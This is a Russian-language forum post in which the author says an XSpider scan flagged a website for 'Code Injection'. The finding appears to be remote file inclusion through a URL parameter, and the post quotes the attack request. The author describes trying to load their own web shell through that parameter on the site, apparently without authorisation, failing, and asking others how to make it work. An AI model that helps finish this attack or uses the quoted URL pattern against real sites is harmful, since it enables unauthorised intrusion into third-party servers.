И так я создаю новую тему и не судите меня да не судимы будете (так как мне наврятли ответят в теме специальной) лан начнем...
И так насканил (xspider прогой) я тут сайт там обнаружилась серьезная уязвимость с описанием таким вот

" Возможно выполнение атаки "Code Injection". Это может позволить атакующему выполнить произвольный код на вашей системе, взятый с удаленного сервера.

Запрос для выполнения атаки:

http://sait.com/news/?filter=http://wwwwwwww/ "

что еще за код инжект? я сначало подумал(прочитав описание) что нужно указывать путь до шелла вместо "http://wwwwwww/" но указав путь до моего шелла (хост не поддерживает php) шелл был как и в .txt формате как и .php (просто я уже не помню в каком формате надо указывать) у меня ничего не вышло..... Есть какие идеи? Или это не может быть вообще уязв?